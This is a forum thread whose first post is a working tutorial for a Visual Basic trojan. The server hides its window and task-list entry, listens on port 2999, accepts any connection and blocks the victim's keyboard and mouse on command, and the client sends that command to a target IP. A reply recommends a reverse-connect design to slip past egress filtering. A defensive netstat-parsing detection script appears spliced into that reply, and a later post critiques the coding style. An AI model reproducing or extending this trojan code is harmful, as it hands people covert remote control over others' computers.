simple trojan in VB
#1
Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go through what you need for both and some sample code.

Server
The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it. To do this you start by using VB

Code:
Private Sub Form_Load()
    Me.Visible = False
End Sub
This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier. So to get our application hidden from that a little better we make our code look like this.

Code:
Private Sub Form_Load()
    Me.Visible = False
    App.TaskVisible = False
End Sub
So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this tutorial sucks right about now, so let's make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it able to listen for connections when it loads. So in order to do this we need to add a Winsock Control. I named my control win but you can name yours whatever.

Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.

Code:
Private Sub Form_Load()
    Me.Visible = False
    App.TaskVisible = False
    win.LocalPort = 2999
    win.RemotePort = 455
    win.Listen
End Sub
This code will set the local open port to 2999 and the port it sends to is 455. So now, we have a program that listens but still doesn't do anything neat. Let's make it block the input of the user completely when we tell it to!

To do this little devious thing we need to add a module with the following code:

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

Then we add this code to our main form:

Code:
Private Sub win_ConnectionRequest(ByVal requestID As Long)
    win.Close
    win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
    win.GetData GotDat
    DoActions (GotDat)
End Sub

The code in the module is called a Windows API. It uses a DLL file to do tasks that we want. Now this code still won't block the user's input, but we are very close. We now need to program the DoActions function that we called on our main form. In case you were wondering, the code that we added to the form does two different things. The first sub makes it so all connection requests are automatically accepted. The second sub makes it so all data is automatically accepted, and it then passes all of the data to the function DoActions, which we are about to code.

For the DoActions code, we want to make a public function in the module. So add this code to the module and we are about done with the server of the Trojan!

Code:
Public Function DoActions(x As String)
    Dim Action
    Select Case x
        Case "block"
            Action = BlockInput(True)
    End Select
End Function
Ok, now we have a program that, when the data "block" is sent to it on port 2999, will block the user's input. I made a Select Case statement so it is easy to modify this code to your own needs later on. I recommend adding an unblock feature of your own. To do that, just call the BlockInput function with the argument False instead of True.

Main Form

Code:
Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub

Private Sub win_ConnectionRequest(ByVal requestID As Long) ' As corrected by steroidsRlegal
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
     win.GetData GotDat
     DoActions (GotDat)
End Sub
Remember to add your winsock control and name it to win if you use this code.
That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the command "block", let's make a client that sends the command "block".

Make a form and add a Winsock Control, a text box, and three buttons. The text box should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdBlockInput, and cmdDisconnect. Now let's look at the code we would use to make our Client.

Code:
Private Sub cmdConnect_Click()
    IpAddy = txtIp.Text
    Win.Close
    Win.RemotePort = 2999
    Win.RemoteHost = IpAddy
    Win.LocalPort = 9999
    Win.Connect
    cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
    Win.Close
    cmdConnect.Enabled = True
End Sub

Private Sub cmdBlockInput_Click()
    Win.SendData "block"
End Sub
That is the code for the client. All it does is get the IP address from txtIp and connect to it on remote port 2999. Then, when connected, you can send the "block" data to block off their input.
#2
That is not a good idea at all. First of all, do not use a Windows form; you will write a command line executable, hide it correctly and put in a reference to the Windows.Forms namespace. Never do this, it's just a bad idea, no offense; I once made this mistake. Second of all, always make it a reverse connect trojan, as egress filtering over port 1024 is usually allowed by a system level or hardware level firewall. This being said, I can write a small reverse connect trojan for you guys and all that, but I didn't try it multi yet, so it's not that advanced, as I'm not into .NET that much.
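From the defender's side, the two posts above describe exactly what a host-based check should look for: the server in #1 hides its window and task-list entry but still has to hold an open listening socket (TCP 2999 here), and #2 points out that a reverse-connect variant instead shows up as an outbound connection that permissive egress filtering lets through. The following script is an added example, not code from this thread; it parses output in the layout of Windows `netstat -ano`, joins it with a PID-to-image-name map, and flags listening ports outside a host baseline and established outbound connections not on a per-process allowlist. The sample output, process names, baseline ports and allowlist are all constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample in the layout of `netstat -ano` on Windows (not real host data).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:2999           0.0.0.0:0              LISTENING       4120
  TCP    192.168.1.20:51234     203.0.113.7:443        ESTABLISHED     2210
  TCP    192.168.1.20:51240     198.51.100.9:4444      ESTABLISHED     4120
  UDP    0.0.0.0:5353           *:*                                    2210
"""

# Constructed PID -> image name map, as `tasklist` would report it (assumption).
PROCESS_NAMES = {912: "svchost.exe", 4: "System", 4120: "update.exe", 2210: "chrome.exe"}

# Host baseline, assumed for this example: ports expected to listen on this
# machine, and which processes may talk out and on which remote ports.
EXPECTED_LISTEN_PORTS = {135, 139, 445, 3389}
EGRESS_ALLOWLIST = {"chrome.exe": {80, 443}}

# Proto, local address, foreign address, optional state (UDP has none), PID.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+([A-Z_]+))?\s+(\d+)\s*$")


@dataclass(frozen=True)
class Conn:
    proto: str
    local_host: str
    local_port: Optional[int]
    remote_host: str
    remote_port: Optional[int]
    state: str
    pid: int


def _split_addr(addr: str):
    # rpartition keeps IPv6 forms such as "[::]:135" intact; "*:*" yields no port.
    host, _, port = addr.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text: str):
    """Parse netstat -ano style lines; header and blank lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, laddr, raddr, state, pid = m.groups()
        lh, lp = _split_addr(laddr)
        rh, rp = _split_addr(raddr)
        conns.append(Conn(proto, lh, lp, rh, rp, state or "", int(pid)))
    return conns


def unexpected_listeners(conns, expected=EXPECTED_LISTEN_PORTS, names=PROCESS_NAMES):
    """TCP sockets in LISTENING state on ports outside the host baseline."""
    return sorted(
        (c.local_port, c.pid, names.get(c.pid, "?"))
        for c in conns
        if c.proto == "TCP" and c.state == "LISTENING" and c.local_port not in expected
    )


def unexpected_egress(conns, allow=EGRESS_ALLOWLIST, names=PROCESS_NAMES):
    """ESTABLISHED TCP connections from a process, or to a remote port, not allowlisted."""
    findings = []
    for c in conns:
        if c.proto != "TCP" or c.state != "ESTABLISHED":
            continue
        name = names.get(c.pid, "?")
        if c.remote_port not in allow.get(name, set()):
            findings.append((name, c.pid, c.remote_host, c.remote_port))
    return findings


def report(text: str = NETSTAT_SAMPLE):
    """Run both checks over one netstat capture and return the findings."""
    conns = parse_netstat(text)
    return {"listeners": unexpected_listeners(conns), "egress": unexpected_egress(conns)}


if __name__ == "__main__":
    for kind, items in report().items():
        for item in items:
            print(kind, item)
```

On the constructed sample this reports the hidden listener on 2999 owned by the unrecognised process and the same process's outbound connection to a non-allowlisted port, while the browser's HTTPS session passes. The point of keying the egress check on the process name rather than only the port is the one #2 raises: a reverse-connect implant can pick any remote port the firewall permits, so the allowlist has to say which binaries are expected to talk out at all.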
#3
I have to agree with tutmoses.
The PoC is a good approach at demystifying the complexity of a RAT. Which in its basics is pretty trivial.

However, I constantly see VB.NET developers who start off with a WinForms application and hide the System.Windows.Forms.Form by calling Hide().
Doing so seems to me very much like a lack of skills, honestly. Usually, there is a main entry point where you can implement a message loop. However, way too many times I just see "Create new solution -> WinForms Application -> Call Hide() like I always do".

Why?

There is no answer to this, except not knowing how a program is composed. Please keep up on these basics as well.